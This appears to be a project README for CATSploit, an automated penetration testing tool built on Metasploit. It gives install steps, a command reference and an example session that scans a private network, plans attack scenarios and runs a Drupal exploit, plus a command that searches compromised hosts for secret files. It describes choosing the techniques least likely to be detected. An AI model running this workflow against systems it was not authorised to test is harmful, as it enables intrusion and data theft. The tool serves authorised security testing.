CATSploit is an automated penetration testing tool using Cyber Attack Techniques Scoring (CATS) method that can be used without pentester. Currently, pentesters implicitly made the selection of suitable attack techniques for target systems to be attacked. CATSploit uses system configuration information such as OS, open ports, software version collected by scanner and calculates a score value for capture eVc and detectability eVd of each attack techniques for target system. By selecting the highest score values, it is possible to select the most appropriate attack technique for the target system without hack knack(professional pentesterβs skill) .
CATSploit automatically performs penetration tests in the following sequence:
Information gathering and prior information input First, gathering information of target systems. CATSploit supports nmap and OpenVAS to gather information of target systems. CATSploit also supports prior information of target systems if you have.
Calculating score value of attack techniques Using information obtained in the previous phase and attack techniques database, evaluation values of capture (eVc) and detectability (eVd) of each attack techniques are calculated. For each target computer, the values of each attack technique are calculated.
Selection of attack techniques by using scores and make attack scenario Select attack techniques and create attack scenarios according to pre-defined policies. For example, for a policy that prioritized hard-to-detect, the attack techniques with the lowest eVd(Detectable Score) will be selected.
Execution of attack scenario CATSploit executes the attack techniques according to attack scenario constructed in the previous phase. CATSploit uses Metasploit as a framework and Metasploit API to execute actual attacks.
CATSploit has the following prerequisites:
For Metasploit, Nmap and OpenVAS, it is assumed to be installed with the Kali Distribution.
To install the latest version of CATSploit, please use the following commands:
$ git clone https://github.com/catsploit/catsploit.git
$ cd catsploit
$ git clone https://github.com/catsploit/cats-helper.git
$ sudo ./setup.sh
CATSploit is a server-client configuration, and the server reads the configuration JSON file at startup.  In config.json, the following fields should be modified for your environment.
(*) Adjust the number according to the specs of your machine.
To start the server, execute the following command:
$ python cats_server.py -c [CONFIG_FILE]
Next, prepare another console, start the client program, and initiate a connection to the server.
$ python catsploit.py -s [SOCKET_PATH]
After successfully connecting to the server and initializing it, the session will start.
   _________  ___________       __      _ __
  / ____/   |/_  __/ ___/____  / /___  (_) /_
 / /   / /| | / /  \__ \/ __ \/ / __ \/ / __/
/ /___/ ___ |/ /  ___/ / /_/ / / /_/ / / /_
\____/_/  |_/_/  /____/ .___/_/\____/_/\__/
                     /_/
[*] Connecting to cats-server
[*] Done.
[*] Initializing server
[*] Done.
catsploit>
The client can execute a variety of commands. Each command can be executed with -h option to display the format of its arguments.
usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...
positional arguments:
  {host,scenario,scan,plan,attack,post,reset,help,exit}
options:
  -h, --help       show this help message and exit 
I've posted the commands and options below as well for reference.
host list:
 show information about the hosts
 usage:  host list [-h] 
 options:
  -h, --help       show this help message and exit
host detail:
 show more information about one host
 usage:  host detail [-h] host_id 
 positional arguments:
  host_id          ID of the host for which you want to show information
 options:
  -h, --help       show this help message and exit
scenario list:
 show information about the scenarios
 usage:  scenario list [-h]
 options:
  -h, --help       show this help message and exit
scenario detail:
 show more information about one scenario
 usage:  scenario detail [-h] scenario_id
 positional arguments:
  scenario_id      ID of the scenario for which you want to show information
 options:
  -h, --help       show this help message and exit
scan:
 run network-scan and security-scan
 usage:  scan [-h] [--port PORT] targe   t_host [target_host ...]
 positional arguments:
  target_host      IP address to be scanned
 options:
  -h, --help       show this help message and exit
  --port PORT      ports to be scanned
plan:
 planning attack scenarios
 usage:  plan [-h] src_host_id dst_host_id
 positional arguments:
  src_host_id      originating host
  dst_host_id      target host
 options:
  -h, --help       show this help message and exit
attack:
 execute attack scenario
 usage:  attack [-h] scenario_id
 positional arguments:
  scenario_id      ID of the scenario you want to execute
 options:
  -h, --help       show this help message and exit
post find-secret:
 find confidential information files that can be performed on the pwned host
 usage:  post find-secret [-h] host_id
 positional arguments:
  host_id          ID of the host for which you want to find confidential information
 op   tions:
  -h, --help       show this help message and exit
reset:
 reset data on the server
 usage:  reset [-h] {system} ...
 positional arguments:
  {system}         reset system
options:
  -h, --help  show this help message and exit
exit:
  exit CATSploit
  usage:  exit [-h]
  options:
   -h, --help  show this help message and exit
In this example, we use CATSploit to scan network, plan the attack scenario, and execute the attack.
catsploit> scan 192.168.0.0/24
Network Scanning ... 100%
[*] Total 2 hosts were discovered.
Vulnerability Scanning ... 100%
[*] Total 14 vulnerabilities were discovered.
catsploit> host list
ββββββββββββ³βββββββββββββββββ³βββββββββββ³βββββββββββββββββββββββββββββββββββ³ββββββββ
β hostID   β IP             β Hostname β Platform                         β Pwned β
β‘ββββββ βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β attacker β 0.0.0.0        β kali     β kali 2022.4                      β True  β
β h_exbiy6 β 192.168.0.10   β          β Linux 3.10 - 4.11                β False β
β h_nhqyfq β 192.168.0.20   β          β Microsoft Windows 7 SP1          β False β
ββββββββββββ΄ ββββββββββββββββ΄βββββββββββ΄βββββββββββββββββββββββββββββββββββ΄ββββββββ
catsploit> host detail h_exbiy6
ββββββββββββ³βββββββββββββββ³βββββββββββ³βββββββββββββββ³ββββββββ
β hostID   β IP           β Hostname β Platform     β Pwned β
β‘ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β h_exbiy6 β 192.168.0.10 β ubuntu   β ubuntu 14.04 β False β
ββββββββββββ΄βββββββββββββββ΄βββββββββββ΄βββββββββββββββ΄β ββββββ
[IP address]
ββββββββββββββββ³βββββββββββ³βββββββ³βββββββββββββ
β ipv4         β ipv4mask β ipv6 β ipv6prefix β
β‘ββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.0.10 β          β      β            β
βββββββββββββ ββ΄βββββββββββ΄βββββββ΄βββββββββββββ
[Open ports]
ββββββββββββββββ³ββββββββ³βββββββ³ββββββββββββββ³βββββββββββββββ³βββββββββββββββββββββββββββββ
β ip           β proto β port β service     β product      β version                       β
β‘ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.0.10 β tcp   β 21   β ftp         β ProFTPD      β 1.3.5                      β
β 192.168.0.10 β tcp   β 22   β ssh         β OpenSSH      β 6.6.1p1 Ubuntu 2ubuntu2.10 β
β 192.168.0.10 β tcp   β 80   β http        β Apache httpd β 2.4.7                      β
β 192.168.0.10 β tcp   β 445  β netbios-ssn β Samba smbd   β 3.X - 4.X                  β
β 192.168.0.10 β tcp   β 631  β ipp         β CUPS         β 1.7                        β
ββββββββββββββββ΄ββββββββ΄βββββββ΄ββββββββββββββ΄βββββββββββββββ΄βββββββββββββββββββββββββββββ
[Vulnerabilities]
ββββββββββββββββ³ββββββββ³βββββββ³ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ³βββββββββββββββββ
β ip           β proto β port β vuln_name                                                           β cve            β
β‘βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.0.10 β tcp   β 0    β TCP Timestamps Information Disclosure                               β N/A            β
β 192.168.0.10 β tcp   β 21   β FTP Unencrypted Cleartext Login                                     β N/A            β
β 192.168.0.10 β tcp   β 22   β Weak MAC Algorithm(s) Supported (SSH)                               β N/A            β
β 192.168.0.10 β tcp   β 22   β Weak Encryption Algorithm(s) Supported (SSH)                        β N/A            β
β 192.168.0.10 β tcp   β 22   β Weak Host Key Algorithm(s) (SSH)                                    β N/A            β
β 192.168.0.10 β tcp   β 22   β Weak Key Exchange (KEX) Algorithm(s) Supported (SSH)                β N/A            β
β 192.168.0.10 β tcp   β 80   β Test HTTP dangerous methods                                            β N/A            β
β 192.168.0.10 β tcp   β 80   β Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check    β CVE-2014-3704  β
β 192.168.0.10 β tcp   β 80   β Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check β N/A            β
β 192.168.0.10 β tcp   β 80   β Sensitive File Disclosure (HTTP)                                    β N/A            β
β 192.168.0.10 β tcp   β 80   β Unprotected Web App / Device Installers (HTTP)                      β N/A            β
β 192.168.0.10 β tcp   β 80   β Cleartext Transmission of Sensitive Information via HTTP            β N/A            β
β 192.168.0.10 β tcp   β 80   β jQuery < 1.9.0 XSS Vulnerability                                    β CVE-2012-6708  β
β 192.168.0.10 β tcp   β 80   β jQuery < 1.6.3 XSS Vulnerability                                    β CVE-2011-4969  β
β 192.168.0.10 β tcp   β 80   β Drupal 7.0 Information Disclosure Vulnerability - Active Check      β CVE-2011-3730  β
β 192.168.0.10 β tcp   β 631  β SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                  β CVE-2016-2183  β
β 192.168.0.10 β tcp   β 631  β SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                  β CVE-2016-6329  β
β 192.168.0.10 β tcp   β 631  β SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                  β CVE-2020-12872 β
β 192.168.0.10 β tcp   β 631  β SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection          β CVE-2011-3389  β
β 192.168.0.10 β tcp   β 631  β SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection          β CVE-2015-0204  β
ββββββββββββββββ΄ββββββββ΄βββββββ΄ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ΄βββ&   #9472;βββββββββββββ
[Users]
βββββββββββββ³ββββββββ
β user name β group β
β‘ββββββββββββββββββββ©
βββββββββββββ΄ββββββββ
catsploit> plan attacker h_exbiy6
Planning attack scenario...100%
[*] Done. 15 scenarios was planned.
[*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
catsploit> scenario list
βββββββββββββββ³βββββ ββββββββ³βββββββββββββββββ³ββββββββ³ββββββββ³ββββββββ³ββββββββββββββββββββββββββββββββ
β scenario id β src host ip β target host ip β eVc   β eVd   β steps β first attack step             β
β‘ββββββββββββββββββββββββββββββββββββγ   3;ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β 3d3ivc      β 0.0.0.0     β 192.168.0.10   β 1.0   β 32.0  β 1     β exploit/multi/http/jenkins_sβ¦ β
β 5gnsvh      β 0.0.0.0     β 192.168.0.10   β 1.0   β 53.76 β 2     β exploit/multi/http/jenkins_sβ¦ β
β 6nlxyc      β 0.0.0.0     β 192.168.0.10   β 0.0   β 48.32 β 2     β exploit/multi/http/jenkins_sβ¦ β
β 8jos4z      β 0.0.0.0     β 192.168.0.1   0   β 0.7   β 72.8  β 2     β exploit/multi/http/jenkins_sβ¦ β
β 8kmmts      β 0.0.0.0     β 192.168.0.10   β 0.0   β 32.0  β 1     β exploit/multi/elasticsearch/β¦ β
β agjmma      β 0.0.0.0     β 192.168.0.10   β 0.0   β 24.0  β 1     β exploit/windows/http/manageeβ¦ β
β joglhf      β 0.0.0.0     β 192.168.0.10   β 70.0  β 60.0  β 1     β auxiliary/scanner/ssh/ssh_loβ¦ β
β rmgrof      β 0.0.0.0     β 192.168.0.10   β 100.0 β 32.0  β 1     β exploit/multi/http/drupal_drβ¦ β
β xuowzk      β 0.0.0.0     β 192.168.0.10   β 0.0   β 24.0  β 1     β exploit/multi/http/struts_dmβ¦ β
β yttv51      β 0.0.0.0     β 192.168.0.10   β 0.01  β 53.76    β 2     β exploit/multi/http/jenkins_sβ¦ β
β znv76x      β 0.0.0.0     β 192.168.0.10   β 0.01  β 53.76 β 2     β exploit/multi/http/jenkins_sβ¦ β
βββββββββββββββ΄ββββββββββββββ΄βββββββββββββββββ΄ββββββββ΄ββββββββ΄ββββββββ΄ββββββββββββββββββββββββββββββββ
catsploit> scenario detail rmgrof
βββββββββββββββ³βββββββββββββββββ³ββββββββ³βββββββ
β src host ip β target host ip β eVc   β eVd  β
β‘ββββββββββββββββββββββββββββββββββββββββββββββ©
β 0.0.0.0     β 192.168.0.10   β 100.0 β 32.0 β
βββββββββββββββ΄ββββββββ ββββββββ΄ββββββββ΄βββββββ
[Steps]
βββββ³ββββββββββββββββββββββββββββββββββββββββ³ββββββββββββββββββββββββ
β # β step                                  β params                β
β‘βββββββββββββββββββββββββββββββ ββββββββββββββββββββββββββββββββββββ©
β 1 β exploit/multi/http/drupal_drupageddon β RHOSTS: 192.168.0.10  β
β   β                                       β LHOST: 192.168.10.100 β
βββββ΄ββββββββββββββββββββββββββββββββββββββββ΄ββββββββββββββββββββββββ
catsploit> attack rmgrof
> ~> ~
> Metasploit Console Log
> ~
> ~
[+] Attack scenario succeeded!
catsploit> exit
Bye.
All informations and codes are provided solely for educational purposes and/or testing your own systems.
For any inquiry, please contact the email address as follows:
catsploit@nk.MitsubishiElectric.co.jp